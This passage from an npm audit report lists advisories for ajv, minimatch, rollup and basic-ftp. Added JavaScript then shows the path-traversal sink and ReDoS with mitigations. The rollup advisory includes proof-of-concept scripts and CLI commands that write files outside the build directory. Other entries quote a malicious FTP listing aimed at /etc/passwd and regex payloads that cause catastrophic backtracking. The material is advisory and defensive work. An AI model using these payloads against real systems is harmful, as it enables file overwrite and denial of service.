"patched_versions": ">=6.14.2",
"updated": "2026-02-12T20:08:00.000Z",
"cvss": {
"score": 3.7,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
},
"cwe": [
"CWE-20"
],
"url": "https://github.com/advisories/GHSA-w7fw-mjwx-w883"
},
"1113428": {
"findings": [
{
"version": "6.12.6",
"paths": [
"packages__ui>eslint>ajv"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://nvd.nist.gov/vuln/detail/CVE-2025-69873\n- https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md\n- https://github.com/ajv-validator/ajv/pull/2586\n- https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5\n- https://github.com/ajv-validator/ajv/releases/tag/v8.18.0\n- https://github.com/ajv-validator/ajv/pull/2588\n- https://github.com/ajv-validator/ajv/releases/tag/v6.14.0\n- https://github.com/advisories/GHSA-2g4f-4pwh-qvx6",
"created": "2026-02-11T21:30:39.000Z",
"id": 1113428,
"npm_advisory_id": null,
"overview": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `^(a|a)*$`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data: true` for dynamic schema validation.",
"reported_by": null,
"title": "ajv has ReDoS when using `$data` option",
"metadata": null,
"cves": [
"CVE-2025-69873"
],
"access": "public",
"severity": "moderate",
"module_name": "ajv",
"vulnerable_versions": "<6.14.0",
"github_advisory_id": "GHSA-2g4f-4pwh-qvx6",
"recommendation": "Upgrade to version 6.14.0 or later",
"patched_versions": ">=6.14.0",
"updated": "2026-02-23T22:40:32.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-400",
"CWE-1333"
],
"url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6"
},
"1113459": {
"findings": [
{
"version": "3.1.2",
"paths": [
".>@turbo/gen>node-plop>del>rimraf>glob>minimatch"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26\n- https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-26996\n- https://github.com/advisories/GHSA-3ppc-4f35-3m26",
"created": "2026-02-18T22:38:11.000Z",
"id": 1113459,
"npm_advisory_id": null,
"overview": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)), i.e. exponential.\n\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input\n\n----\n\nThanks to @ljharb for back-porting the fix to legacy versions of minimatch.",
"reported_by": null,
"title": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern",
"metadata": null,
"cves": [
"CVE-2026-26996"
],
"access": "public",
"severity": "high",
"module_name": "minimatch",
"vulnerable_versions": "<3.1.3",
"github_advisory_id": "GHSA-3ppc-4f35-3m26",
"recommendation": "Upgrade to version 3.1.3 or later",
"patched_versions": ">=3.1.3",
"updated": "2026-02-24T20:59:58.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-1333"
],
"url": "https://github.com/advisories/GHSA-3ppc-4f35-3m26"
},
"1113465": {
"findings": [
{
"version": "9.0.0",
"paths": [
".>@turbo/gen>minimatch"
]
},
{
"version": "9.0.5",
"paths": [
"sites__mainweb>typescript-eslint>@typescript-eslint/typescript-estree>minimatch"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26\n- https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-26996\n- https://github.com/advisories/GHSA-3ppc-4f35-3m26",
"created": "2026-02-18T22:38:11.000Z",
"id": 1113465,
"npm_advisory_id": null,
"overview": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)), i.e. exponential.\n\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input\n\n----\n\nThanks to @ljharb for back-porting the fix to legacy versions of minimatch.",
"reported_by": null,
"title": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern",
"metadata": null,
"cves": [
"CVE-2026-26996"
],
"access": "public",
"severity": "high",
"module_name": "minimatch",
"vulnerable_versions": ">=9.0.0 <9.0.6",
"github_advisory_id": "GHSA-3ppc-4f35-3m26",
"recommendation": "Upgrade to version 9.0.6 or later",
"patched_versions": ">=9.0.6",
"updated": "2026-02-24T20:59:58.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-1333"
],
"url": "https://github.com/advisories/GHSA-3ppc-4f35-3m26"
},
"1113466": {
"findings": [
{
"version": "10.1.1",
"paths": [
".>minimatch"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26\n- https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-26996\n- https://github.com/advisories/GHSA-3ppc-4f35-3m26",
"created": "2026-02-18T22:38:11.000Z",
"id": 1113466,
"npm_advisory_id": null,
"overview": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)), i.e. exponential.\n\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input\n\n----\n\nThanks to @ljharb for back-porting the fix to legacy versions of minimatch.",
"reported_by": null,
"title": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern",
"metadata": null,
"cves": [
"CVE-2026-26996"
],
"access": "public",
"severity": "high",
"module_name": "minimatch",
"vulnerable_versions": ">=10.0.0 <10.2.1",
"github_advisory_id": "GHSA-3ppc-4f35-3m26",
"recommendation": "Upgrade to version 10.2.1 or later",
"patched_versions": ">=10.2.1",
"updated": "2026-02-24T20:59:58.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-1333"
],
"url": "https://github.com/advisories/GHSA-3ppc-4f35-3m26"
},
"1113515": {
"findings": [
{
"version": "4.57.1",
"paths": [
"packages__api>vitest>vite>rollup"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\n- https://nvd.nist.gov/vuln/detail/CVE-2026-27606\n- https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\n- https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\n- https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\n- https://github.com/rollup/rollup/releases/tag/v2.80.0\n- https://github.com/rollup/rollup/releases/tag/v3.30.0\n- https://github.com/rollup/rollup/releases/tag/v4.59.0\n- https://github.com/advisories/GHSA-mw96-cpmx-2vgc",
"created": "2026-02-25T22:37:26.000Z",
"id": 1113515,
"npm_advisory_id": null,
"overview": "### Summary\nThe Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.\n\n### Details\nThe vulnerability is caused by the combination of two flawed components in the Rollup core:\n\n1. **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets does not match the period (`.`) or the forward and backward slashes (`/`, `\\`), so those characters are never replaced.\n   ```typescript\n   // src/utils/sanitizeFileName.ts (Line 3)\n   const INVALID_CHAR_REGEX = /[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g;\n   ```\n   This allows path traversal sequences like `../../` to pass through the sanitizer unmodified.\n\n2. **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the \"sanitized\" filename.\n   ```typescript\n   // src/rollup/rollup.ts (Line 317)\n   const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);\n   ```\n   Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write.\n\n### PoC\nA demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.\n\n**Scenario: CLI Named Input Exploit**\n1. Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`).\n2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:\n   ```bash\n   rollup --input \"a/../../pwned.js=main.js\" --dir dist\n   ```\n3. **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder.\n\n**Reproduction files provided:**\n* `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug.\n* `exploit.py`: Automated script to run the PoC and verify the file escape.\n\nvuln_app.js\n```js\nconst path = require('path');\nconst fs = require('fs');\n\n/**\n * REPLICATED ROLLUP VULNERABILITY\n *\n * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)\n * 2. Unsafe Path Resolution (from src/rollup/rollup.ts)\n */\n\nfunction sanitize(name) {\n  // The vulnerability: Rollup's regex fails to strip dots and slashes,\n  // allowing path traversal sequences like '../'\n  return name.replace(/[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g, '_');\n}\n\nfunction build(userSuppliedName) {\n  const outputDir = path.join(__dirname, 'dist');\n  const fileName = sanitize(userSuppliedName);\n\n  // Vulnerability: path.resolve() follows traversal sequences in the filename\n  const outputPath = path.resolve(outputDir, fileName);\n\n  console.log(`[*] Target write path: ${outputPath}`);\n\n  if (!fs.existsSync(path.dirname(outputPath))) {\n    fs.mkdirSync(path.dirname(outputPath), { recursive: true });\n  }\n\n  fs.writeFileSync(outputPath, 'console.log(\"System Compromised!\");');\n  console.log('[+] File written successfully.');\n}\n\nbuild(process.argv[2] || 'bundle.js');\n```\n\nexploit.py\n```py\nimport subprocess\nfrom pathlib import Path\n\n\ndef run_poc():\n    # Target a file outside the 'dist' folder\n    poc_dir = Path(__file__).parent\n    malicious_filename = \"../pwned_by_rollup.js\"\n    target_path = poc_dir / \"pwned_by_rollup.js\"\n\n    print(\"=== Rollup Path Traversal PoC ===\")\n    print(f\"[*] Malicious Filename: {malicious_filename}\")\n\n    # Trigger the vulnerable app (path resolved relative to this script, so the cwd does not matter)\n    subprocess.run([\"node\", str(poc_dir / \"vuln_app.js\"), malicious_filename], check=True)\n\n    if target_path.exists():\n        print(\"[SUCCESS] File escaped 'dist' folder!\")\n        print(f\"[SUCCESS] Created: {target_path}\")\n        # target_path.unlink()  # Cleanup\n    else:\n        print(\"[FAILED] Exploit did not work.\")\n\n\nif __name__ == \"__main__\":\n    run_poc()\n```\n\n**PoC run against the real CLI:**\n```bash\nrollup --input \"bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js\" --dir dist\n```\n\n<img width=\"1918\" height=\"1111\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4\" />\n\n### Impact\nThis is a **High** severity vulnerability.\n* **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges.\n* **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.\n* **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise.",
"reported_by": null,
"title": "Rollup 4 has Arbitrary File Write via Path Traversal",
"metadata": null,
"cves": [
"CVE-2026-27606"
],
"access": "public",
"severity": "high",
"module_name": "rollup",
"vulnerable_versions": ">=4.0.0 <4.59.0",
"github_advisory_id": "GHSA-mw96-cpmx-2vgc",
"recommendation": "Upgrade to version 4.59.0 or later",
"patched_versions": ">=4.59.0",
"updated": "2026-02-25T22:37:27.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-22"
],
"url": "https://github.com/advisories/GHSA-mw96-cpmx-2vgc"
},
"1113518": {
"findings": [
{
"version": "5.1.0",
"paths": [
".>@turbo/gen>proxy-agent>pac-proxy-agent>get-uri>basic-ftp"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-5rq4-664w-9x2c\n- https://nvd.nist.gov/vuln/detail/CVE-2026-27699\n- https://github.com/patrickjuchli/basic-ftp/commit/2a2a0e6514357b9eda07c2f8afbd3f04727a7cd9\n- https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.0\n- https://github.com/advisories/GHSA-5rq4-664w-9x2c",
"created": "2026-02-25T22:34:26.000Z",
"id": 1113518,
"npm_advisory_id": null,
"overview": "The `basic-ftp` library contains a path traversal vulnerability in the `downloadToDir()` method. A malicious FTP server can send directory listings with filenames containing path traversal sequences (`../`) that cause files to be written outside the intended download directory.\n\n## Source-to-Sink Flow\n\n```\n1. SOURCE: FTP server sends LIST response\n└─> \"-rw-r--r-- 1 user group 1024 Jan 20 12:00 ../../../etc/passwd\"\n\n2. PARSER: parseListUnix.ts:100 extracts filename\n└─> file.name = \"../../../etc/passwd\"\n\n3. VALIDATION: parseListUnix.ts:101 checks\n└─> if (name === \".\" || name === \"..\") ❌ (only filters exact matches)\n└─> \"../../../etc/passwd\" !== \".\" && !== \"..\" ✅ PASSES\n\n4. SINK: Client.ts:707 uses filename directly\n└─> const localPath = join(localDirPath, file.name)\n└─> join(\"/safe/download\", \"../../../etc/passwd\")\n└─> Result: join() normalizes the \"..\" segments and yields \"/etc/passwd\"\n\n5. FILE WRITE: Client.ts:512 opens file\n└─> fsOpen(localPath, \"w\") → writes to /etc/passwd (outside intended directory)\n```\n\n## Vulnerable Code\n\n**File**: `src/Client.ts:707`\n\n```typescript\nprotected async _downloadFromWorkingDir(localDirPath: string): Promise<void> {\n    await ensureLocalDirectory(localDirPath)\n    for (const file of await this.list()) {\n        const localPath = join(localDirPath, file.name) // ⚠️ VULNERABLE\n        // file.name comes from untrusted FTP server, no sanitization\n        await this.downloadTo(localPath, file.name)\n    }\n}\n```\n\n**Root Cause**:\n- Parser validation (`parseListUnix.ts:101`) only filters exact `.` or `..` entries\n- No sanitization of `../` sequences in filenames\n- `path.join()` normalizes `..` segments instead of rejecting them, and `fs.open()` then writes to the resulting path\n\n## Impact\n\nA malicious FTP server can:\n- Write files to arbitrary locations on the client filesystem\n- Overwrite critical system files (if user has write access)\n- Potentially achieve remote code execution\n\n## Affected Versions\n\n- **Tested**: v5.1.0\n- **Likely**: All versions (code pattern exists since initial implementation)\n\n## Mitigation\n\n**Workaround**: Do not use `downloadToDir()` with untrusted FTP servers.\n\n**Fix**: Sanitize filenames before use:\n\n```typescript\nimport { basename } from 'path'\n\n// In _downloadFromWorkingDir:\nconst sanitizedName = basename(file.name) // Strip path components\nconst localPath = join(localDirPath, sanitizedName)\n```\n\nNote that `basename('..')` returns `..` unchanged, so the parser's exact-match filter for `.` and `..` entries must stay in place alongside this fix.",
"reported_by": null,
"title": "Basic FTP has Path Traversal Vulnerability in its downloadToDir() method",
"metadata": null,
"cves": [
"CVE-2026-27699"
],
"access": "public",
"severity": "critical",
"module_name": "basic-ftp",
"vulnerable_versions": "<5.2.0",
"github_advisory_id": "GHSA-5rq4-664w-9x2c",
"recommendation": "Upgrade to version 5.2.0 or later",
"patched_versions": ">=5.2.0",
"updated": "2026-02-25T22:34:27.000Z",
"cvss": {
"score": 9.1,
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
},
"cwe": [
"CWE-22"
],
"url": "https://github.com/advisories/GHSA-5rq4-664w-9x2c"
}
},
"muted": [],
"metadata": {
"vulnerabilities": {
"info": 0,
"low": 2,
"moderate": 6,
"high": 9,
"critical": 1
},
"dependencies": 924,
"devDependencies": 0,
"optionalDependencies": 0,
"totalDependencies": 924
}
}
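The two path-traversal advisories in this audit (rollup, GHSA-mw96-cpmx-2vgc, and basic-ftp, GHSA-5rq4-664w-9x2c) share one sink: a file name from an untrusted source (a CLI chunk alias, a plugin, an FTP LIST line) is handed to `path.resolve` or `path.join`, which follow `..`. The JavaScript below is an added example written for this page; it is not part of audit.json and not code from rollup or basic-ftp. The helper names, the output directory `/srv/app/dist` and the sample names are constructed for the demonstration and nothing is written to disk. It shows the sink, the `basename` fix the basic-ftp advisory suggests, and a containment check that still allows subdirectories, which is what a bundler needs:

```javascript
'use strict';
const path = require('path');

// The sink as both advisories describe it: resolve() follows "../" in the
// untrusted part and hands back a path outside outputDir.
function unsafeOutputPath(outputDir, untrustedName) {
  return path.resolve(outputDir, untrustedName);
}

// Mitigation A, the fix the basic-ftp advisory proposes: keep only the last
// segment. Any directory part, hostile or not, is discarded.
function basenameOnly(outputDir, untrustedName) {
  return path.join(outputDir, path.basename(untrustedName));
}

// Mitigation B (editor's addition): keep relative sub-paths such as "chunks/x.js"
// but refuse anything that resolves outside outputDir. Returns the absolute
// target path, or null when the name must be rejected.
function containedPath(outputDir, untrustedName) {
  if (typeof untrustedName !== 'string' || untrustedName.length === 0) return null;
  if (untrustedName.includes('\0')) return null;       // NUL would truncate in the fs call
  if (path.isAbsolute(untrustedName)) return null;     // "/etc/passwd" style names
  const base = path.resolve(outputDir);
  const target = path.resolve(base, untrustedName);
  // Strict prefix including the separator: "/srv/app/dist-evil/x" must not
  // count as inside "/srv/app/dist", and the directory itself is not a file.
  if (!target.startsWith(base + path.sep)) return null;
  return target;
}

// Constructed names, including the advisories' own payloads, run through all three.
function demo(outputDir = '/srv/app/dist') {
  const names = ['main.js', 'chunks/vendor.js', 'chunks/../main.js',
    'a/../../pwned.js', '../../../etc/passwd', '/etc/passwd', '..'];
  return names.map((name) => ({
    name,
    unsafe: unsafeOutputPath(outputDir, name),
    basename: basenameOnly(outputDir, name),
    contained: containedPath(outputDir, name),
  }));
}

if (require.main === module) {
  for (const row of demo()) console.log(row);
}
```

`basenameOnly` flattens any directory layout and leaves a bare `..` entry unchanged (`path.basename('..')` is `..`), so it relies on an upstream exact-match filter like the one basic-ftp's parser already has. `containedPath` compares the resolved target against `base + path.sep`, so a sibling directory such as `dist-evil` is not accepted as inside `dist`. Symbolic links already present under the output directory are a separate concern that a string comparison cannot see.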
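The minimatch advisories (GHSA-3ppc-4f35-3m26) and the ajv advisory (GHSA-2g4f-4pwh-qvx6) are both ReDoS, reached from different directions: minimatch builds a regex with one lazy group per `*`, ajv compiles a regex that arrives in the data via `$data`. The JavaScript below is an added example written for this page; it is not part of audit.json and not code from minimatch or ajv. `globToRegExpSource` is a reduced model of the compilation the minimatch advisory describes (not minimatch's own compiler), the star-collapsing mitigation is the editor's and is not claimed to be the upstream patch, and `looksCatastrophic` is a deliberately conservative heuristic. The sample patterns and subjects are constructed.

```javascript
'use strict';

// ---- minimatch advisory: one lazy group per "*" ------------------------------
// Reduced model of the compilation the advisory describes: "*" -> "[^/]*?",
// "?" -> "[^/]", everything else literal, plus the leading-dot guard.
function globToRegExpSource(pattern, collapseStars) {
  let out = '^(?!\\.)';
  for (let i = 0; i < pattern.length; ) {
    const c = pattern[i];
    if (c === '*') {
      let j = i;
      while (j < pattern.length && pattern[j] === '*') j++;
      // Mitigation (editor's): a run of N "*" accepts exactly the strings one
      // "*" accepts, so one group per run removes the exponential splits.
      out += '[^/]*?'.repeat(collapseStars ? 1 : j - i);
      i = j;
    } else if (c === '?') {
      out += '[^/]';
      i++;
    } else {
      out += c.replace(/[.+^${}()|[\]\\]/g, '\\$&');
      i++;
    }
  }
  return out + '$';
}

function countStarGroups(source) {
  return source.split('[^/]*?').length - 1;
}

// Times one match so the blow-up is visible; the ms value is informational.
function timeMatch(source, input) {
  const re = new RegExp(source);
  const t0 = process.hrtime.bigint();
  const matched = re.test(input);
  return { matched, ms: Number(process.hrtime.bigint() - t0) / 1e6 };
}

// ---- ajv advisory: a regex taken from data -----------------------------------
// Heuristic pre-check before an untrusted pattern reaches RegExp(): reject a
// quantified group whose body contains alternation or another quantifier
// ("(a|a)*", "(a+)+"). Conservative on purpose: it also rejects "(a|b)+".
function looksCatastrophic(pattern) {
  const opens = [];
  let escaped = false;
  let inClass = false;
  for (let i = 0; i < pattern.length; i++) {
    const c = pattern[i];
    if (escaped) { escaped = false; continue; }
    if (c === '\\') { escaped = true; continue; }
    if (inClass) { if (c === ']') inClass = false; continue; }
    if (c === '[') { inClass = true; continue; }
    if (c === '(') { opens.push(i); continue; }
    if (c === ')') {
      const open = opens.pop();
      if (open === undefined) return true;             // unbalanced: treat as unsafe
      const q = pattern[i + 1];
      if (q === '*' || q === '+' || q === '{') {
        if (/[|*+{]/.test(pattern.slice(open + 1, i))) return true;
      }
    }
  }
  return opens.length > 0;
}

function compileUntrustedPattern(pattern, maxLength = 256) {
  if (typeof pattern !== 'string' || pattern.length > maxLength) {
    throw new Error('pattern rejected: not a string or too long');
  }
  if (looksCatastrophic(pattern)) throw new Error('pattern rejected: catastrophic backtracking risk');
  return new RegExp(pattern);   // may still throw on invalid syntax
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed: ten stars, then a literal the subject does not contain.
  const glob = '*'.repeat(10) + 'X';
  const subject = 'a'.repeat(12);
  for (const collapse of [false, true]) {
    const src = globToRegExpSource(glob, collapse);
    const r = timeMatch(src, subject);
    console.log(`${collapse ? 'collapsed' : 'per-star '} groups=${countStarGroups(src)} matched=${r.matched} ms=${r.ms.toFixed(2)}`);
  }
  console.log('ajv-style check:', looksCatastrophic('^(a|a)*$'), looksCatastrophic('^[a-z]+@[a-z]+\\.[a-z]{2,}$'));
}
```

Run with `node` to see the per-star and collapsed variants matched against the same subject: with ten stars the per-star regex already explores hundreds of thousands of backtracking states before failing, the collapsed one fails immediately, and both give the same answer on every subject. For production use against patterns from untrusted input a linear-time engine such as RE2, or an established safety checker, is preferable to a hand-rolled heuristic; the one here is conservative and rejects `(a|b)+`, which a precise analysis would accept.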